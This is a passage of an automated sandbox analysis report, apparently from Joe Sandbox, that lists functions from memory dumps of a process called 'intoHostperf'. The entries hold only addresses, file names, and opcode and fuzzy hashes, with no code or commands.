                                                              Function 00007FF8491582D2 Relevance: .1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 622650b20ea9e7273c1eb1f5b0ffa056635920faee161fea72f7448ec2430543
                                                              • Instruction ID: 3ffb2ad1a41fb7939e933397f95e4c4b0efe38a11da9ce66803c426b414abf6b
                                                              • Opcode Fuzzy Hash: 622650b20ea9e7273c1eb1f5b0ffa056635920faee161fea72f7448ec2430543
                                                              • Instruction Fuzzy Hash: 9E21D775E1895D9FDFA8EF18D455AECB7B1FB68314F0141AED00EE3291CA39A9818F40
                                                              Function 00007FF8494ECD88 Relevance: .1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1f9863be107864ae50f2ee2cf7d584ec1a3160d38d6c3a349832b0d5e84fb6d
                                                              • Instruction ID: 6f46ae0f8ae0d54b6ccd8316fba6b54cea0190e0ac81fe1f4c7fea46ded8be04
                                                              • Opcode Fuzzy Hash: c1f9863be107864ae50f2ee2cf7d584ec1a3160d38d6c3a349832b0d5e84fb6d
                                                              • Instruction Fuzzy Hash: 1E21A72092C4E7CEE6789A18C464DB57751FF59390B2446FAD04B8B4CECB2CB882D351
                                                              Function 00007FF849163258 Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2d4276aafa421ebe9d3cfdd0e48e7abd28032ed7ad4246b03971a8d351965da
                                                              • Instruction ID: 8f46de12e053d27987d118421cb9653f4eb7f4b0ac681d3ea47986d5d1d2fb8f
                                                              • Opcode Fuzzy Hash: e2d4276aafa421ebe9d3cfdd0e48e7abd28032ed7ad4246b03971a8d351965da
                                                              • Instruction Fuzzy Hash: C521BB10D2C6E78FF53EBA0884646B47A51FFD0346B2446B5D45FC74DAD92CBC819B90
                                                              Function 00007FF8494E1220 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 601932a18f0edca7e0f98f0be8075eaa699a2b172721d27d9ad24dc8f0f7d543
                                                              • Instruction ID: c695e8c65c0b86766385dcb693ad9f708684076411c66822e49446140c23bf89
                                                              • Opcode Fuzzy Hash: 601932a18f0edca7e0f98f0be8075eaa699a2b172721d27d9ad24dc8f0f7d543
                                                              • Instruction Fuzzy Hash: 2A11D81095C4AA8EEE38AA0DC864DB47252FB5838AF14467AD04BDB5CAC82CF9C1D780
                                                              Function 00007FF8491517F0 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c28c597e594d0686b4c9dc6624f47b92bcb3657bbd04f9fa61b5d96697d1f67
                                                              • Instruction ID: 141cac299d542ff4ee47273d436cbf9538997af1370acbc81fb06b10e5ec4409
                                                              • Opcode Fuzzy Hash: 4c28c597e594d0686b4c9dc6624f47b92bcb3657bbd04f9fa61b5d96697d1f67
                                                              • Instruction Fuzzy Hash: A611B711D2C8AA8FE6399A088464DB4B351FB90375F294A79D44B8B4CAC92CF9819B80
                                                              Function 00007FF8494E02A0 Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81b7b36071c562bf1b2e0617295d450008fbf73842a1dbfbe1d23408cb11671a
                                                              • Instruction ID: 001584450b0f97850367e9348b0f760b44e5a2094e8831952bb1d3afee229c65
                                                              • Opcode Fuzzy Hash: 81b7b36071c562bf1b2e0617295d450008fbf73842a1dbfbe1d23408cb11671a
                                                              • Instruction Fuzzy Hash: 8E119131A0EA5A4FEB65BF25D4015FA73A1EF543A1F40057AE04EC75C2CF2CA845C7A1
                                                              Function 00007FF849150870 Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d5f034c929f734633bca2a550707b0be83281f7d969d9994fa8112f9cf180348
                                                              • Instruction ID: f6d5e1f6faf37c419339d611edeb8ea0863c32dffe2f1b8d02e92c3da82c1285
                                                              • Opcode Fuzzy Hash: d5f034c929f734633bca2a550707b0be83281f7d969d9994fa8112f9cf180348
                                                              • Instruction Fuzzy Hash: 9011C431A0EA1A5EEB65FF248401AFAB391FF54391F40053AE04EC75C2CF2CB5058791
                                                              Function 00007FF8494E7F10 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea4ba49649a0a685866d1d01903c6c55c672f98fed05e372e321f0081d96fac9
                                                              • Instruction ID: 45e8dda87b25b653797c22b8fefb75d9363c80ac12f3dbb7d0c2b8dc779b61a8
                                                              • Opcode Fuzzy Hash: ea4ba49649a0a685866d1d01903c6c55c672f98fed05e372e321f0081d96fac9
                                                              • Instruction Fuzzy Hash: 42118F3091D95A4EEB65FE28D4419F673A1EF943A1F40063AE04EC75C2DE2CA885C291
                                                              Function 00007FF8494E011E Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc9454975d269e7857df37a08861551c811045bcc2b2d3b3513b0a5c8ebcb86c
                                                              • Instruction ID: e589493c3876a10dcab7fb9639d7981247d728c11c89875337c2fad7d0b8c395
                                                              • Opcode Fuzzy Hash: bc9454975d269e7857df37a08861551c811045bcc2b2d3b3513b0a5c8ebcb86c
                                                              • Instruction Fuzzy Hash: D211083164E54B8FEB1AAE58D8116F57390EF553A1F00013AE519CB5C1CF3DA991C790
                                                              Function 00007FF8491506EE Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb0d3d712eb844557f8f1732c4ae29d30b2c5fa9e0b59c942d61b1b865206574
                                                              • Instruction ID: 800bbcba5b3c424cc2f2aec3a2e93b0c6e2f284510a2f579de660bc90a069e8a
                                                              • Opcode Fuzzy Hash: cb0d3d712eb844557f8f1732c4ae29d30b2c5fa9e0b59c942d61b1b865206574
                                                              • Instruction Fuzzy Hash: BB110831A0E54A4FEB19AE58D811BF5B391EF553A1F01013AE90DCB6D1CB3DA551CBD0
                                                              Function 00007FF849159DEE Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 334aba09f954806adac6387433def090b82ca65a6ef183a41d74d2798232e588
                                                              • Instruction ID: 85fef271a68f4d76570714dced0ed9cd38a694e8b00bb6fbe3444f7c20ac3e59
                                                              • Opcode Fuzzy Hash: 334aba09f954806adac6387433def090b82ca65a6ef183a41d74d2798232e588
                                                              • Instruction Fuzzy Hash: D011483160E94A4FFB19AE08D4016F5B791EF553E1F41013BE40DC72C1CB2CA950CB91
                                                              Function 00007FF8494E7D8E Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a47354d46cea3dc042e67c99d161f29e24c060dea44510f2ade3e4a295aaeb40
                                                              • Instruction ID: 0ae59b9b9ef93e2fef7eb6691f39b9a6e261b819c1b912f0ec74905cd9eea609
                                                              • Opcode Fuzzy Hash: a47354d46cea3dc042e67c99d161f29e24c060dea44510f2ade3e4a295aaeb40
                                                              • Instruction Fuzzy Hash: 8011083164E54A8FEB29AE1CD411AF57390EFA53A1F00413AE509C76C2DF2DA990C7D0
                                                              Function 00007FF849159F7D Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 62c0715fbc8f87e88b73ef45db71eafcfbe9b8c5dbb829a352743e80891dcd3a
                                                              • Instruction ID: 96c4bd0bf336d2a96830d0eaa13575a3fc75d5bd9d1631ef51fce8c207353cfc
                                                              • Opcode Fuzzy Hash: 62c0715fbc8f87e88b73ef45db71eafcfbe9b8c5dbb829a352743e80891dcd3a
                                                              • Instruction Fuzzy Hash: 3B11E130A5E99A5EEB65BE2494015F9B791FF443E1F80053BE04EC74C2CE2CB90587A1
                                                              Function 00007FF848D9288C Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc2b5d08bb40c43407f0fe2c790d6f6536354bbcd1c9a01f50b6f51996c238b6
                                                              • Instruction ID: 2e9d6ef56883922dcc80d70d79f4969dc8f93efd8dd5acc4f45920b3e63901cb
                                                              • Opcode Fuzzy Hash: bc2b5d08bb40c43407f0fe2c790d6f6536354bbcd1c9a01f50b6f51996c238b6
                                                              • Instruction Fuzzy Hash: D4119122E0E91A4FEBA0FA1894587B822A2FF48394F5502B6C41DE32D6DF286D484748
                                                              Function 00007FF84915944E Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36f5474e0cb58a873d6e7474f653c5e24fcc09b8994adc365a7cfa44e35c7c0d
                                                              • Instruction ID: 1839cbd6beacd7595bf451fdf1316dc3552459be46c539a8924d7c81321b4e8a
                                                              • Opcode Fuzzy Hash: 36f5474e0cb58a873d6e7474f653c5e24fcc09b8994adc365a7cfa44e35c7c0d
                                                              • Instruction Fuzzy Hash: DE01C431E0D9994FEB59FBA894515FCB7B0EF453A0F41017ED04AC7283DA2C5802C741
                                                              Function 00007FF848D928CD Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 977e230d7d44a1115f897b79ffbb3a2cfd09fd1a820884c2a4e3de8d938e0dc1
                                                              • Instruction ID: 90c63ce7f17967825bed086637687f072ece26adb55de8253b97ff88bda040bc
                                                              • Opcode Fuzzy Hash: 977e230d7d44a1115f897b79ffbb3a2cfd09fd1a820884c2a4e3de8d938e0dc1
                                                              • Instruction Fuzzy Hash: 0D112E32E4E9094FEB94FB24D858BB823A2EF94394F1541B5D45EC7292DF28AC498B04
                                                              Function 00007FF848D90C38 Relevance: .1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9df9bbdf0ae04f036f607666629acf6cc140737047877e1fe886c8c7ec35a738
                                                              • Instruction ID: dbf5a4a3bc78d9008fa302a6168f2ab363c1fc77c6c3fd5b18ee387613431660
                                                              • Opcode Fuzzy Hash: 9df9bbdf0ae04f036f607666629acf6cc140737047877e1fe886c8c7ec35a738
                                                              • Instruction Fuzzy Hash: 6201D236E0E60D9FE701FB68E8402EC7BA0EF41398F1444B6C444DB285EB346A498788
                                                              Function 00007FF849157BBE Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d1cb66327602752d21cf266ade84eb19f37a40f71cc44017fb7266b3d3beb33
                                                              • Instruction ID: 9a0c90f314feb02d8d31cb53c66fe88c9c91d70884ea3b94e2b0715c1ca2dd66
                                                              • Opcode Fuzzy Hash: 1d1cb66327602752d21cf266ade84eb19f37a40f71cc44017fb7266b3d3beb33
                                                              • Instruction Fuzzy Hash: 86F0A931B0D5494FDB59AA1C98072BD73D1EF89265B00017FE48EC7556DE2558424685
                                                              Function 00007FF848D964F1 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20512074a12266699dc4255e7b5892bb163b02b1cedfcdd129d6dac834af34b3
                                                              • Instruction ID: 898813c649d5ef15c0df3101402fb000520c4d74167e6f4e4115ab0b49058d41
                                                              • Opcode Fuzzy Hash: 20512074a12266699dc4255e7b5892bb163b02b1cedfcdd129d6dac834af34b3
                                                              • Instruction Fuzzy Hash: AE115E3090C9188FCB59EF14D895BA9B3A1FB55344F1042AED44ED3291DF34A989CB86
                                                              Function 00007FF848D90C40 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 806ad3458644a0ecceecc04363e89d3710b805608adba25f2b5f5b4f55550e04
                                                              • Instruction ID: 6b39c2d07dc01e035863cadb317eca54bf8d8bcd6a5beb00e62fc07edb1e2692
                                                              • Opcode Fuzzy Hash: 806ad3458644a0ecceecc04363e89d3710b805608adba25f2b5f5b4f55550e04
                                                              • Instruction Fuzzy Hash: 5301D436E0E64D9FE701FF68E4402ED7BA0EF41398F1045B6C444DB285DB346A898B84
                                                              Function 00007FF848D90C48 Relevance: .0, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d26c20bed8f6fbe674cd7501deee23cf209212002b3817a7a03b8bcc3a86352f
                                                              • Instruction ID: ca24e7f414344beac43dfe4d80a3a6079374ee11f97b74844e18fe465bdfab33
                                                              • Opcode Fuzzy Hash: d26c20bed8f6fbe674cd7501deee23cf209212002b3817a7a03b8bcc3a86352f
                                                              • Instruction Fuzzy Hash: C901AD36E0E24DDFE705FF68D4806EDBBA0EF41398F1441B6C4449B295EB346A88CB84
                                                              Function 00007FF8494E6572 Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e54720ad5e2110bc51fa58cc0ffac8fee14278a723fcb6a7618ba034360ba9be
                                                              • Instruction ID: a1ceb60cda1f1020cd449f0eaa20c21f9753bcfe817810a36f279592eda44af6
                                                              • Opcode Fuzzy Hash: e54720ad5e2110bc51fa58cc0ffac8fee14278a723fcb6a7618ba034360ba9be
                                                              • Instruction Fuzzy Hash: 01F0F63284D2C5DFDB1AEF70D8254E53FA4EF43210F1800F6E049CB0A2C92D5A8AC761
                                                              Function 00007FF848D90C50 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5fd99627bdf31b0f0c58bda6dc9c6453d15dbdabf93fd5b3b91ca86e5ea0a6ea
                                                              • Instruction ID: c95ae16e3a1d233fa4ea484813ead0f6625f0c723845f7fab1837eed7ef034b4
                                                              • Opcode Fuzzy Hash: 5fd99627bdf31b0f0c58bda6dc9c6453d15dbdabf93fd5b3b91ca86e5ea0a6ea
                                                              • Instruction Fuzzy Hash: 9FF08C35D0E24AEFE704FB6494846EDBBA0EF01388F2441B5C4449B285EB346A888785
                                                              Function 00007FF8491585E2 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 99b2e15e71ab61dab16e42ef94fd5923bde53b2b42246a80157c6cc07a2e75cc
                                                              • Instruction ID: 1f37f249ba054ab79b26c90c334ca6f4cfed06037831c616a3df6bd5fdbfa372
                                                              • Opcode Fuzzy Hash: 99b2e15e71ab61dab16e42ef94fd5923bde53b2b42246a80157c6cc07a2e75cc
                                                              • Instruction Fuzzy Hash: 8BF0623184E2C69FD317DF7088554E9BFB4EF43264F1A04FAE05ACB0A2D66D5606CB62
                                                              Function 00007FF848D9298C Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23bff3b5278a79fc7291a079496af7c1a00b8357622fdaa8020450df6609f1ba
                                                              • Instruction ID: 7e3802aa863b2714f5254178a9e367bfe3f390e3e64c5024a6e707b8732cb838
                                                              • Opcode Fuzzy Hash: 23bff3b5278a79fc7291a079496af7c1a00b8357622fdaa8020450df6609f1ba
                                                              • Instruction Fuzzy Hash: 48F0313294D81A4EEB94FA54D848BF833A1EF84355F1101B9C01DD3195DF286D858B04
                                                              Function 00007FF849159DC8 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2512949024.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849150000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c31f8db0d33493ae1ce03dd50a758effbbc5e71a8a53c698d5c19e58c6ab9c27
                                                              • Instruction ID: ce62653c5641b340a8461e85b8e18cc75b43432426f39290b2e68cf25d99611d
                                                              • Opcode Fuzzy Hash: c31f8db0d33493ae1ce03dd50a758effbbc5e71a8a53c698d5c19e58c6ab9c27
                                                              • Instruction Fuzzy Hash: 7BF05E2190EA8B8EF7763D1094111F9BA55AF513F1FA2103BD50E865C2CD1D69015B93
                                                              Function 00007FF848D90B77 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a090285b04ecf7d8278ae1340a3b4bae20ee22d42a27f059d8fc60ab5447434a
                                                              • Instruction ID: 8d89066429898371d070cef467626143232ea86355af343c5f79e4a136d99d5f
                                                              • Opcode Fuzzy Hash: a090285b04ecf7d8278ae1340a3b4bae20ee22d42a27f059d8fc60ab5447434a
                                                              • Instruction Fuzzy Hash: 1BE02BBA95EA45CFD780A638DCA06D5BBA0FF0134DF4602BEC089C3652E391585DC780
                                                              Function 00007FF8494E726A Relevance: .0, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b910003f4ba6bd5172649ea83043032cc488586edfaaaad4a7129be5c906f1b1
                                                              • Instruction ID: 08c39ee011c97e4a758ab1b39f92b497f9e7408e843299c5c94c6feb2ac7bf11
                                                              • Opcode Fuzzy Hash: b910003f4ba6bd5172649ea83043032cc488586edfaaaad4a7129be5c906f1b1
                                                              • Instruction Fuzzy Hash: 7EF0902190E7C64FEF32AF68CC914A83FE09F6736070906FAD0888B2D7D55C2446D711
                                                              Function 00007FF848D9293D Relevance: .0, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 73315f076465e318b0f9a4094c1e21ea03a8bba1b2101b4396e9b90e5b510417
                                                              • Instruction ID: 80e1c17ead88d3626fbaac9d836ab1c23a1797dad72b5e2c2f51e3724dbd81a1
                                                              • Opcode Fuzzy Hash: 73315f076465e318b0f9a4094c1e21ea03a8bba1b2101b4396e9b90e5b510417
                                                              • Instruction Fuzzy Hash: F6F01232A4D4094FEBA4FA14D8887B923A2EF943A9F1501B5C45DD31E6DF286D498644
                                                              Function 00007FF8494E31A8 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2606797585.00007FF8494E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff8494e0000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a15e2e1d6c094b5f9c18b2a0b2de94ad40e03c77fd574d715a917f2e055e4afe
                                                              • Instruction ID: 300e23ac7695e2a1e5bb27e9ddbccf1e4b1abb5aec3d7e3e9ff76a8c86765e63
                                                              • Opcode Fuzzy Hash: a15e2e1d6c094b5f9c18b2a0b2de94ad40e03c77fd574d715a917f2e055e4afe
                                                              • Instruction Fuzzy Hash: 57E0C270D2C85E8EDF65EF88C4015FDB6B0FF48380F50007AC10EE2184DA282480C661
                                                              Function 00007FF848D946BF Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2429704239.00007FF848D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d90000_intoHostperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 45e2cf9707910c3fdd346bfba52b70efc523ed230843f40ce1b1c88199279e75
                                                              • Instruction ID: 658fd1017f4b75447b6d0adec61c6b49a63817441a2586e2302687ca817f20cd
                                                              • Opcode Fuzzy Hash: 45e2cf9707910c3fdd346bfba52b70efc523ed230843f40ce1b1c88199279e75
                                                              • Instruction Fuzzy Hash: 1DE01A31E0E4174FFB64F614D8407B96262AF98388F1400B4DA0ED32D2DF3CAD858A49
                                                              Function 00007FF848D906A5 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
